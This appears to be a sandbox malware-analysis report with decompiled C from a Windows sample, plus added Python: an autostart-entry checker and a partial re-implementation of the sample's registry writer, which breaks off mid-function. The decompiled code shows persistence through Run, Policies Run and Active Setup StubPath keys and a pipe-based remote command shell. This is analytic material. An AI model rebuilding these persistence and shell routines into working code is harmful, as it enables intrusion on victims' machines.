                                    • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,000000FF,00000010,00000000,00000000,?,?,COMSPEC,?,00000105,?,?), ref: 24037F89
                                    • CloseHandle.KERNEL32(?,?,00000000,?,00000000,00000000,000000FF,00000010,00000000,00000000,?,?,COMSPEC,?,00000105,?), ref: 24037F92
                                    • SetNamedPipeHandleState.KERNEL32(?,00000001,00000000,00000000,?,?,00000000,?,00000000,00000000,000000FF,00000010,00000000,00000000,?,?), ref: 24037FAA
                                    • Sleep.KERNEL32(0000000A,?,00000001,00000000,00000000,?,?,00000000,?,00000000,00000000,000000FF,00000010,00000000,00000000,?), ref: 24037FB1
                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 24037FC1
                                    • ReadFile.KERNEL32(?,?,00001000,?,00000000,0000000A,?,00000001,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 24037FEA
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00027D20,00000000,00000000,?), ref: 2403806B
                                    • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,00001000,?,00000000,0000000A,?,00000001,00000000,00000000,?), ref: 240380B6
                                    • WriteFile.KERNEL32(?,240381C8,00000002,?,00000000,?,00000000,00000000,?,00000000,?,?,00001000,?,00000000,0000000A), ref: 240380CC
                                    • GetExitCodeProcess.KERNEL32(?,00000103), ref: 240380E8
                                    • TerminateProcess.KERNEL32(?,00000000,?,00000103,0000000A,?,00000001,00000000,00000000,?,?,00000000,?,00000000,00000000,000000FF), ref: 240380FF
                                    • CloseHandle.KERNEL32(?,?,00000103,0000000A,?,00000001,00000000,00000000,?,?,00000000,?,00000000,00000000,000000FF,00000010), ref: 24038108
                                    • CloseHandle.KERNEL32(?,?,?,00000103,0000000A,?,00000001,00000000,00000000,?,?,00000000,?,00000000,00000000,000000FF), ref: 24038111
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CreateHandle$CloseProcess$FilePipe$CodeExitThreadWrite$EnvironmentInfoNamedReadSleepStartupStateTerminateVariable
                                    • String ID: COMSPEC$shellresposta|shellativar|$shellresposta|shelldesativar|$shellresposta|shellresposta|
                                    • API String ID: 3902820650-3990598949
                                    • Opcode ID: 6d2c92e930fca7cf32dc9125755f39d3876dcd65a95b02000958a48807007dc0
                                    • Instruction ID: f2f398b32e489b53aff198b4d0e01d696116fab14257e085d1716adc7e29fc98
                                    • Opcode Fuzzy Hash: 6d2c92e930fca7cf32dc9125755f39d3876dcd65a95b02000958a48807007dc0
                                    • Instruction Fuzzy Hash: BD812171900208AFEF51CBA4CC91FDEBBFCBB58304F5044A5E648F7284DA74AA858F65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 62%
                                    			E24055240(void* __ebx, void* __edi, void* __esi) {
                                    				char _v8;
                                    				char _v12;
                                    				void* _v16;
                                    				char _v20;
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v44;
                                    				char _v48;
                                    				char _v52;
                                    				char _v56;
                                    				char _v60;
                                    				char _v64;
                                    				char _v68;
                                    				char _v72;
                                    				char _v76;
                                    				char _v80;
                                    				char _v84;
                                    				char _v88;
                                    				char _v92;
                                    				char _v96;
                                    				char _v100;
                                    				char _v104;
                                    				char _v108;
                                    				char _v112;
                                    				char _v116;
                                    				char _v120;
                                    				char _v124;
                                    				char _v128;
                                    				char _v132;
                                    				char _v136;
                                    				char _v140;
                                    				char _v144;
                                    				char _v148;
                                    				char _v152;
                                    				char _v156;
                                    				char _v160;
                                    				char _v164;
                                    				char _v168;
                                    				char _v172;
                                    				intOrPtr* _t93;
                                    				intOrPtr* _t94;
                                    				intOrPtr* _t95;
                                    				char* _t117;
                                    				char* _t118;
                                    				intOrPtr* _t119;
                                    				long _t123;
                                    				void* _t151;
                                    				char _t152;
                                    				void** _t155;
                                    				intOrPtr* _t179;
                                    				intOrPtr* _t255;
                                    				intOrPtr* _t272;
                                    				intOrPtr* _t283;
                                    				intOrPtr* _t300;
                                    				intOrPtr* _t311;
                                    				void* _t312;
                                    				intOrPtr* _t317;
                                    				void* _t319;
                                    				intOrPtr* _t320;
                                    				void* _t322;
                                    				void* _t323;
                                    				void* _t324;
                                    				void* _t325;
                                    				void* _t326;
                                    				void* _t327;
                                    				void* _t328;
                                    				void* _t329;
                                    				void* _t330;
                                    				intOrPtr* _t334;
                                    				intOrPtr _t335;
                                    				intOrPtr _t390;
                                    				intOrPtr* _t393;
                                    				void* _t395;
                                    				intOrPtr _t397;
                                    				intOrPtr _t398;
                                    				intOrPtr _t401;
                                    				intOrPtr _t402;
                                    				intOrPtr _t403;
                                    				intOrPtr _t404;
                                    
                                    				_t394 = __esi;
                                    				_t397 = _t398;
                                    				_t312 = 0x15;
                                    				goto L1;
                                    				while(1) {
                                    					L3:
                                    					Sleep(0x1388);
                                    					_t93 =  *0x2405ab5c; // 0x2405b8f8
                                    					_t401 =  *_t93;
                                    					if(_t401 != 0) {
                                    						_push(0);
                                    						_push( &_v20);
                                    						_t283 =  *0x2405ab5c; // 0x2405b8f8
                                    						E24013274( &_v24, E24013534( *_t283));
                                    						_push(_v24);
                                    						E24013274( &_v28, "Software\\Microsoft\\Windows\\CurrentVersion\\Run");
                                    						_pop(_t329);
                                    						E240170B8(0x80000002, _t311, _t329, _v28, _t394, _t401);
                                    						E24013480(_v20,  *_t311);
                                    						if(_t401 != 0) {
                                    							E24013274( &_v32, E24013534( *_t311));
                                    							_push(_v32);
                                    							_t300 =  *0x2405ab5c; // 0x2405b8f8
                                    							E24013274( &_v36, E24013534( *_t300));
                                    							_push(_v36);
                                    							E24013274( &_v40, "Software\\Microsoft\\Windows\\CurrentVersion\\Run");
                                    							_pop(_t330);
                                    							E24016858(0x80000002, _t311, _t330, _v40, _t394, _t401);
                                    						}
                                    					}
                                    					_t94 =  *0x2405ab88; // 0x2405b8fc
                                    					_t402 =  *_t94;
                                    					if(_t402 != 0) {
                                    						_push(0);
                                    						_push( &_v44);
                                    						_t255 =  *0x2405ab88; // 0x2405b8fc
                                    						E24013274( &_v48, E24013534( *_t255));
                                    						_push(_v48);
                                    						E24013274( &_v52, "Software\\Microsoft\\Windows\\CurrentVersion\\Run");
                                    						_pop(_t327);
                                    						E240170B8(0x80000001, _t311, _t327, _v52, _t394, _t402);
                                    						E24013480(_v44,  *_t311);
                                    						if(_t402 != 0) {
                                    							E24013274( &_v56, E24013534( *_t311));
                                    							_push(_v56);
                                    							_t272 =  *0x2405ab88; // 0x2405b8fc
                                    							E24013274( &_v60, E24013534( *_t272));
                                    							_push(_v60);
                                    							E24013274( &_v64, "Software\\Microsoft\\Windows\\CurrentVersion\\Run");
                                    							_pop(_t328);
                                    							E24016858(0x80000001, _t311, _t328, _v64, _t394, _t402);
                                    						}
                                    					}
                                    					_t403 =  *_t393;
                                    					if(_t403 != 0) {
                                    						_push(0);
                                    						_push( &_v68);
                                    						E24013274( &_v72, E24013534( *_t393));
                                    						_push(_v72);
                                    						E24013274( &_v76, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run");
                                    						_pop(_t323);
                                    						E240170B8(0x80000002, _t311, _t323, _v76, _t394, _t403);
                                    						E24013480(_v68,  *_t311);
                                    						if(_t403 != 0) {
                                    							E24013274( &_v80, E24013534( *_t311));
                                    							_push(_v80);
                                    							E24013274( &_v84, E24013534( *_t393));
                                    							_push(_v84);
                                    							E24013274( &_v88, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run");
                                    							_pop(_t326);
                                    							E24016858(0x80000002, _t311, _t326, _v88, _t394, _t403);
                                    						}
                                    						_push(0);
                                    						_push( &_v92);
                                    						E24013274( &_v96, E24013534( *_t393));
                                    						_push(_v96);
                                    						E24013274( &_v100, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run");
                                    						_pop(_t324);
                                    						E240170B8(0x80000001, _t311, _t324, _v100, _t394, _t403);
                                    						E24013480(_v92,  *_t311);
                                    						if(_t403 != 0) {
                                    							E24013274( &_v104, E24013534( *_t311));
                                    							_push(_v104);
                                    							E24013274( &_v108, E24013534( *_t393));
                                    							_push(_v108);
                                    							E24013274( &_v112, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run");
                                    							_pop(_t325);
                                    							E24016858(0x80000001, _t311, _t325, _v112, _t394, _t403);
                                    						}
                                    					}
                                    					_t95 =  *0x2405ab8c; // 0x2405b8f4
                                    					_t404 =  *_t95;
                                    					if(_t404 != 0) {
                                    						_push(0);
                                    						_push( &_v116);
                                    						E24013274( &_v120, "StubPath");
                                    						_push(_v120);
                                    						_t317 =  *0x2405ab8c; // 0x2405b8f4
                                    						E24013388( &_v128,  *_t317, "Software\\Microsoft\\Active Setup\\Installed Components\\");
                                    						E24013274( &_v124, E24013534(_v128));
                                    						_pop(_t319);
                                    						E240170B8(0x80000002, _t311, _t319, _v124, _t394, _t404);
                                    						E24013480(_v116,  *_t311);
                                    						if(_t404 != 0) {
                                    							E24013274( &_v132, E24013534( *_t311));
                                    							_push(_v132);
                                    							E24013274( &_v136, "StubPath");
                                    							_push(_v136);
                                    							_t320 =  *0x2405ab8c; // 0x2405b8f4
                                    							E24013388( &_v144,  *_t320, "Software\\Microsoft\\Active Setup\\Installed Components\\");
                                    							E24013274( &_v140, E24013534(_v144));
                                    							_pop(_t322);
                                    							E24016858(0x80000002, _t311, _t322, _v140, _t394, _t404);
                                    						}
                                    						RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Active Setup\\Installed Components\\", 0, 0x20006,  &_v16);
                                    						_t179 =  *0x2405ab8c; // 0x2405b8f4
                                    						RegDeleteKeyA(_v16, E24013534( *_t179));
                                    						RegCloseKey(_v16);
                                    					}
                                    					_t334 =  *0x2405ac14; // 0x2405b94c
                                    					_t335 =  *_t334;
                                    					E24013388( &_v148, 0x240558c0, _t335);
                                    					_t395 = E24014F18(0, 0, E24013534(_v148));
                                    					if(GetLastError() != 0xb7) {
                                    						CloseHandle(_t395);
                                    						__eflags = E24016C78( *_t311, _t311, __eflags);
                                    						if(__eflags == 0) {
                                    							L24:
                                    							E24016634( *_t311, _t311, _t393, _t395, __eflags);
                                    							E24016588( *_t311, _t311,  &_v156, _t393, _t395, __eflags);
                                    							E24013274( &_v152, E24013534(_v156));
                                    							E24017450(_v152, _t311, __eflags);
                                    							E24016DA0( *_t311, _t311, _v12, _v8, _t395, __eflags);
                                    							_t117 =  *0x2405ac5c; // 0x2405b94a
                                    							__eflags =  *_t117 - 1;
                                    							if( *_t117 == 1) {
                                    								__eflags = 0;
                                    								E240115E0(0,  &_v160);
                                    								E24013480( *_t311, _v160);
                                    								if(__eflags != 0) {
                                    									E2401757C( *_t311, _t311, _t395, __eflags);
                                    									E24016588( *_t311, _t311,  &_v164, _t393, _t395, __eflags);
                                    									E24017668(_v164, _t311, __eflags);
                                    								}
                                    							}
                                    							_t118 =  *0x2405ab74; // 0x2405b949
                                    							__eflags =  *_t118 - 1;
                                    							if( *_t118 == 1) {
                                    								__eflags = 0;
                                    								E240115E0(0,  &_v168);
                                    								E24013480( *_t311, _v168);
                                    								if(__eflags != 0) {
                                    									E24017728( *_t311, _t311, _t395, __eflags);
                                    									E24016588( *_t311, _t311,  &_v172, _t393, _t395, __eflags);
                                    									E24017728(_v172, _t311, _t395, __eflags);
                                    								}
                                    							}
                                    							L30:
                                    							_t119 =  *0x2405ac14; // 0x2405b94c
                                    							_t394 = E24014F18(0, 0, E24013534( *_t119));
                                    							_t123 = GetLastError();
                                    							__eflags = _t123 - 0xb7;
                                    							if(_t123 != 0xb7) {
                                    								CloseHandle(_t394);
                                    								E240166E4(0, E24013534( *_t311), 0x240558cc, 0, 0, 0x240558c8);
                                    							} else {
                                    								CloseHandle(_t394);
                                    							}
                                    							continue;
                                    						}
                                    						_t151 = E24016438( *_t311, _t311, 0x240558c0, __eflags);
                                    						_push(_t335);
                                    						_push(_t151);
                                    						_t152 = _v12;
                                    						__eflags = 0 - _v40;
                                    						if(__eflags == 0) {
                                    							__eflags = _t152 - _v44;
                                    						}
                                    						if(__eflags == 0) {
                                    							goto L30;
                                    						} else {
                                    							goto L24;
                                    						}
                                    					} else {
                                    						CloseHandle(_t395);
                                    						_t155 =  *0x2405ac4c; // 0x2405b9a0
                                    						CloseHandle( *_t155);
                                    						_pop(_t390);
                                    						 *[fs:eax] = _t390;
                                    						_push(0x240557ba);
                                    						E240130AC( &_v172, 0x27);
                                    						return E24013088( &_v8);
                                    					}
                                    				}
                                    				L1:
                                    				_push(0);
                                    				_push(0);
                                    				_t312 = _t312 - 1;
                                    				if(_t312 != 0) {
                                    					goto L1;
                                    				} else {
                                    					_push(__ebx);
                                    					_push(__esi);
                                    					_t311 =  *0x2405ac24; // 0x2405b980
                                    					_t393 =  *0x2405abd0; // 0x2405b900
                                    					_push(_t397);
                                    					_push(0x240557b3);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t398;
                                    					E24016CE4( *_t311, _t311,  &_v8,  &_v12, _t393, __esi, 0);
                                    					goto L3;
                                    				}
                                    			}
                                    Instruction addresses: 0x24055240 to 0x240557b2 (per-line address column of the listing above)

                                    APIs
                                    • Sleep.KERNEL32(00001388,00000000,240557B3,?,?,?,?,00000000,00000000), ref: 2405527E
                                      • Part of subcall function 24016858: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 2401689E
                                      • Part of subcall function 24016858: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000002,00000000,00000000,00000000,240168FD,?,?,?), ref: 240168C6
                                      • Part of subcall function 24016858: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000002,00000000,00000000,00000000,240168FD,?,?,?), ref: 240168D5
                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,?,00000000,00001388,00000000,240557B3,?,?,?,?,00000000,00000000), ref: 240555C0
                                    • RegDeleteKeyA.ADVAPI32(?,00000000), ref: 240555D6
                                    • RegCloseKey.ADVAPI32(?,?,00000000,80000001,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,?,00000000,00001388,00000000,240557B3), ref: 240555DF
                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00001388,00000000,240557B3,?,?,?,?,00000000,00000000), ref: 24055613
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00001388,00000000,240557B3,?,?,?,?,00000000,00000000), ref: 24055620
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00001388,00000000,240557B3,?,?,?,?,00000000,00000000), ref: 2405562D
                                      • Part of subcall function 240170B8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,24017197,?,?,?), ref: 2401710D
                                      • Part of subcall function 240170B8: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,24017197,?,?,?), ref: 24017131
                                      • Part of subcall function 240170B8: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 2401715B
                                      • Part of subcall function 240170B8: RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,24017197), ref: 2401716F
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00001388,00000000,240557B3,?,?,?,?,00000000,00000000), ref: 24055638
                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00001388,00000000,240557B3,?,?,?,?,00000000,00000000), ref: 2405574D
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00001388,00000000,240557B3,?,?,?,?,00000000), ref: 2405575A
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00001388,00000000,240557B3,?,?,?,?,00000000), ref: 24055765
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Close$Handle$Value$ErrorLastOpenQuery$CreateDeleteSleep
                                    • String ID: Software\Microsoft\Active Setup\Installed Components\$Software\Microsoft\Active Setup\Installed Components\$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run$Software\Microsoft\Windows\CurrentVersion\Run$StubPath$_SAIR$open
                                    • API String ID: 3574299486-1043091203
                                    • Opcode ID: d8260fa19f0db3977ddd100e4d0309d3fd9abb12ab579e73a4ae9fe8752ce983
                                    • Instruction ID: 489dbcfe62d0460f03106508f995dbe181dab17fb4f0b1949807b5604defe5a1
                                    • Opcode Fuzzy Hash: d8260fa19f0db3977ddd100e4d0309d3fd9abb12ab579e73a4ae9fe8752ce983
                                    • Instruction Fuzzy Hash: 6DF10875A001589BEF00EBA8D880E8EB7F9FF65248F504165E409BB26CDA74EEC5CF51
                                    Uniqueness Score: -1.00%
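The String IDs above name the three per-user autostart locations this function touches (Run, Policies\Explorer\Run and an Active Setup StubPath), and the report's signature "Creates an autostart registry key pointing to binary in C:\Windows" is what distinguishes them from legitimate entries. The following is an added example, not code from the report or from the sample: a Python check that parses a small .reg export (constructed inline, with placeholder value names and the placeholder target C:\Windows\constructed\dropped.exe) and lists the values in those locations, marking any whose executable sits under the Windows directory.

```python
import re
from typing import List, Tuple

# Per-user autostart locations named in the String IDs of this function.
RUN_KEYS = {
    r"software\microsoft\windows\currentversion\run",
    r"software\microsoft\windows\currentversion\policies\explorer\run",
}
ACTIVE_SETUP_PREFIX = r"software\microsoft\active setup\installed components" + "\\"

# Targets under the Windows directory are what the report's signature flags.
WINDOWS_DIR_PREFIXES = ("c:\\windows\\", "%systemroot%\\", "%windir%\\")

_KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
_VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.*)$')
_DEFAULT_RE = re.compile(r"^@=(?P<data>.*)$")


def _unescape(s: str) -> str:
    """Undo the .reg quoting of backslashes and double quotes."""
    return s.replace("\\\\", "\\").replace('\\"', '"')


def parse_reg_export(text: str) -> List[Tuple[str, str, str]]:
    """Return (key, value_name, data) triples for the string values of a minimal
    .reg export; non-string values (hex:, dword:) are skipped."""
    entries = []
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        m = _KEY_RE.match(line)
        if m:
            key = m.group("key")
            continue
        if key is None:
            continue
        m = _VALUE_RE.match(line) or _DEFAULT_RE.match(line)
        if not m:
            continue
        data = m.group("data").strip()
        if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            name = m.groupdict().get("name") or ""
            entries.append((key, name, _unescape(data[1:-1])))
    return entries


def executable_of(command: str) -> str:
    """First token of a command line: the quoted path if quoted, else the first word."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split()[0] if command else ""


def find_autostarts(entries):
    """Return (key, value_name, target, in_windows_dir) for every Run / Policies Run
    value and every Active Setup StubPath value."""
    findings = []
    for key, name, data in entries:
        _hive, _, sub = key.partition("\\")
        sub_l = sub.lower()
        is_run = sub_l in RUN_KEYS
        is_stub = sub_l.startswith(ACTIVE_SETUP_PREFIX) and name.lower() == "stubpath"
        if not (is_run or is_stub):
            continue
        target = executable_of(data)
        findings.append((key, name, target, target.lower().startswith(WINDOWS_DIR_PREFIXES)))
    return findings


# Constructed sample export (not from the analysed machine): one benign Run entry
# plus three entries shaped like the persistence this function installs.
SAMPLE_EXPORT = r"""
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"ConstructedRun"="C:\\Windows\\constructed\\dropped.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
"ConstructedPolicy"="C:\\Windows\\constructed\\dropped.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{00000000-0000-0000-0000-000000000000}]
@="constructed component"
"StubPath"="C:\\Windows\\constructed\\dropped.exe restart"
"""


def report(text: str = SAMPLE_EXPORT) -> List[str]:
    """Human-readable lines, Windows-directory targets listed first."""
    lines = []
    for key, name, target, in_win in sorted(find_autostarts(parse_reg_export(text)),
                                             key=lambda f: not f[3]):
        tag = "SUSPECT" if in_win else "ok     "
        lines.append(f"{tag} {key}\\{name} -> {target}")
    return lines


if __name__ == "__main__":
    print("\n".join(report()))
```

Run it against a real export (`reg export HKCU\Software\Microsoft out.reg` on the host) by passing the file contents to `report`; the Active Setup match requires the value to be named StubPath under a component subkey, which is how the sample's RegOpenKeyExA/RegDeleteKeyA calls above address it.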

                                    C-Code - Quality: 80%
                                    			E2402B7D0(char __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
                                    				char _v8;
                                    				char _v12;
                                    				char _v16;
                                    				void* _v20;
                                    				char _v24;
                                    				char _v28;
                                    				signed int _v32;
                                    				char* _v36;
                                    				char _v40;
                                    				char _v44;
                                    				char _v48;
                                    				char _v52;
                                    				void* __ecx;
                                    				void* _t126;
                                    				void* _t128;
                                    				void* _t134;
                                    				char* _t141;
                                    				signed int _t144;
                                    				signed int _t165;
                                    				signed int _t174;
                                    				void* _t176;
                                    				int _t183;
                                    				char* _t185;
                                    				long _t189;
                                    				signed int _t196;
                                    				void* _t198;
                                    				signed int _t203;
                                    				int _t219;
                                    				signed int _t224;
                                    				int _t228;
                                    				char* _t230;
                                    				signed int _t234;
                                    				char* _t237;
                                    				intOrPtr _t254;
                                    				void* _t279;
                                    				void* _t281;
                                    				intOrPtr _t283;
                                    				intOrPtr _t285;
                                    				void* _t296;
                                    				char _t299;
                                    				intOrPtr _t312;
                                    				intOrPtr _t313;
                                    				void* _t316;
                                    
                                    				_t310 = __esi;
                                    				_t309 = __edi;
                                    				_t312 = _t313;
                                    				_t254 = 5;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t254 = _t254 - 1;
                                    					_t315 = _t254;
                                    				} while (_t254 != 0);
                                    				_push(_t254);
                                    				_t1 =  &_v8;
                                    				 *_t1 = _t254;
                                    				_push(__ebx);
                                    				_v16 =  *_t1;
                                    				_v12 = __edx;
                                    				_v8 = __eax;
                                    				E24013524(_v8);
                                    				E24013524(_v12);
                                    				E24013524(_v16);
                                    				_push(_t312);
                                    				_push(0x2402bb82);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t313;
                                    				_t249 = 0;
                                    				E24013590(_v8, E24013674(0x2402bb98, _v8) - 1, 1,  &_v28);
                                    				E240135D0( &_v8, E24013674(0x2402bb98, _v8), 1);
                                    				_push( &_v24);
                                    				_t126 = E2402B35C(_v8, 0, 0x5c, __edi, __esi, _t315) + 1;
                                    				_t316 = _t126;
                                    				_t128 = E2401333C(_v8);
                                    				_t279 = _t126;
                                    				E24013590(_v8, _t128, _t279);
                                    				_push(E2402B35C(_v8, 0, 0x5c, __edi, __esi, _t316));
                                    				_t134 = E2401333C(_v8);
                                    				_pop(_t281);
                                    				E240135D0( &_v8, _t134, _t281);
                                    				E24013480(_v16, 0x2402bba4);
                                    				if(_t316 != 0) {
                                    					_t141 = E24013534(_v8);
                                    					_t144 = RegOpenKeyExA(E2402B224(_v28, 0, __eflags), _t141, 0, 2,  &_v20);
                                    					__eflags = _t144;
                                    					if(_t144 != 0) {
                                    						__eflags = 0;
                                    					} else {
                                    						E24013480(_v16, "REG_SZ");
                                    						if(__eflags == 0) {
                                    							_t228 = E2401333C(_v12);
                                    							_t230 = E24013534(_v12);
                                    							_t234 = RegSetValueExA(_v20, E24013534(_v24), 0, 1, _t230, _t228);
                                    							__eflags = _t234;
                                    							_t40 = _t234 == 0;
                                    							__eflags = _t40;
                                    							_t249 = 0 | _t40;
                                    						}
                                    						E24013480(_v16, "REG_BINARY");
                                    						if(__eflags == 0) {
                                    							_t198 = E2401333C(_v12);
                                    							_t299 = _v12;
                                    							__eflags =  *((char*)(_t299 + _t198 - 1)) - 0x20;
                                    							if( *((char*)(_t299 + _t198 - 1)) != 0x20) {
                                    								E24013344( &_v12, 0x2402bbd8);
                                    							}
                                    							E24013120( &_v32, _v12);
                                    							_v40 = 0;
                                    							_t203 = E2401333C(_v32);
                                    							asm("cdq");
                                    							_push(_t203 / 3);
                                    							E240144F4();
                                    							while(1) {
                                    								__eflags = _v32;
                                    								if(_v32 == 0) {
                                    									break;
                                    								}
                                    								E24013590(_v32, E24013674(0x2402bbd8, _v32) - 1, 0,  &_v44);
                                    								_v36[_v40] = E2402B6E8(_v44, _t249, _t309, _t310, __eflags);
                                    								E240135D0( &_v32, E24013674(0x2402bbd8, _v32) + 1, 1);
                                    								_t65 =  &_v40;
                                    								 *_t65 = _v40 + 1;
                                    								__eflags =  *_t65;
                                    							}
                                    							_t219 = E24014338(_v36);
                                    							_t224 = RegSetValueExA(_v20, E24013534(_v24), 0, 3, _v36, _t219);
                                    							__eflags = _t224;
                                    							_t73 = _t224 == 0;
                                    							__eflags = _t73;
                                    							_t249 = _t249 & 0xffffff00 | _t73;
                                    						}
                                    						E24013480(_v16, "REG_DWORD");
                                    						if(__eflags == 0) {
                                    							_v40 = E2402ACD0(_v12, __eflags);
                                    							_t196 = RegSetValueExA(_v20, E24013534(_v24), 0, 4,  &_v40, 4);
                                    							__eflags = _t196;
                                    							_t81 = _t196 == 0;
                                    							__eflags = _t81;
                                    							_t249 = _t249 & 0xffffff00 | _t81;
                                    						}
                                    						E24013480(_v16, "REG_MULTI_SZ");
                                    						if(__eflags == 0) {
                                    							while(1) {
                                    								_t165 = E24013674(0x2402bc10, _v12);
                                    								__eflags = _t165;
                                    								if(_t165 <= 0) {
                                    									break;
                                    								}
                                    								E24013590(_v12, E24013674(0x2402bc10, _v12) - 1, 1,  &_v48);
                                    								_push(_v48);
                                    								_push(0x2402bc1c);
                                    								_push( &_v52);
                                    								_t174 = E24013674(0x2402bc10, _v12) + 2;
                                    								__eflags = _t174;
                                    								_t176 = E2401333C(_v12);
                                    								_t296 = _t174;
                                    								E24013590(_v12, _t176, _t296);
                                    								_push(_v52);
                                    								E240133FC();
                                    							}
                                    							E24013344( &_v12, 0x2402bc28);
                                    							_t183 = E2401333C(_v12);
                                    							_t185 = E24013534(_v12);
                                    							_t189 = RegSetValueExA(_v20, E24013534(_v24), 0, 7, _t185, _t183);
                                    							_t189 = _t189 == 0;
                                    						}
                                    						RegCloseKey(_v20);
                                    					}
                                    				} else {
                                    					_t237 = E24013534(_v8);
                                    					RegOpenKeyExA(E2402B224(_v28, 0, _t316), _t237, 0, 4,  &_v20);
                                    					RegCreateKeyA(_v20, E24013534(_v24),  &_v20);
                                    					RegCloseKey(_v20);
                                    				}
                                    				_pop(_t283);
                                    				 *[fs:eax] = _t283;
                                    				_push(0x2402bb89);
                                    				E240130AC( &_v52, 3);
                                    				_t285 =  *0x2402b7a8; // 0x2402b7ac
                                    				E24014500( &_v36, _t285);
                                    				E240130AC( &_v32, 3);
                                    				return E240130AC( &_v16, 3);
                                    			}
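E2402B7D0 is the sample's generic registry writer: it peels the root off the front of a full value path, splits the value name off at the last backslash (the E2402B35C(..., 0x5c) calls), dispatches on a type-name string and encodes the data before RegSetValueExA (REG_SZ with strlen as the length, so no terminator; REG_BINARY from space-separated hex pairs with a trailing space appended first; REG_DWORD as a 4-byte integer; REG_MULTI_SZ with NUL separators), or takes the RegCreateKeyA branch when no type is given. The following Python is an added re-implementation of that encoding for reading purposes, not the sample's own code. The root-name table, the multi-string separator (assumed to be "|"), the decimal parsing of REG_DWORD and the empty type string for the key-creation branch are assumptions, because those constants appear only as pointers in the dump.

```python
import struct
from typing import Tuple

# Type codes passed as the 4th RegSetValueExA argument in the decompiled calls.
REG_SZ, REG_BINARY, REG_DWORD, REG_MULTI_SZ = 1, 3, 4, 7

# Assumption: E2402B224 maps the first path component to a predefined root
# handle; its string table is not in the dump, so the usual spellings are used.
ROOT_KEYS = {
    "HKEY_CLASSES_ROOT": 0x80000000, "HKCR": 0x80000000,
    "HKEY_CURRENT_USER": 0x80000001, "HKCU": 0x80000001,
    "HKEY_LOCAL_MACHINE": 0x80000002, "HKLM": 0x80000002,
    "HKEY_USERS": 0x80000003, "HKU": 0x80000003,
}

# Assumption: the REG_MULTI_SZ element separator (constant at 0x2402bc10) is "|".
MULTI_SZ_SEPARATOR = "|"


def split_value_path(path: str) -> Tuple[int, str, str]:
    """'HKCU\\Software\\...\\Run\\Name' -> (root handle, subkey, value name),
    mirroring the first-backslash / last-backslash split in the helper."""
    root_name, _, rest = path.partition("\\")
    subkey, _, value_name = rest.rpartition("\\")
    return ROOT_KEYS[root_name.upper()], subkey, value_name


def encode_value(type_name: str, data: str) -> Tuple[int, bytes]:
    """Return (type code, buffer) as the helper hands them to RegSetValueExA."""
    if type_name == "REG_SZ":
        # Length argument is strlen(data): the terminating NUL is not written.
        return REG_SZ, data.encode("latin-1")
    if type_name == "REG_BINARY":
        # A trailing space is appended if missing, then every space-delimited
        # "XX" token becomes one byte (the helper sizes the buffer as len/3).
        if not data.endswith(" "):
            data += " "
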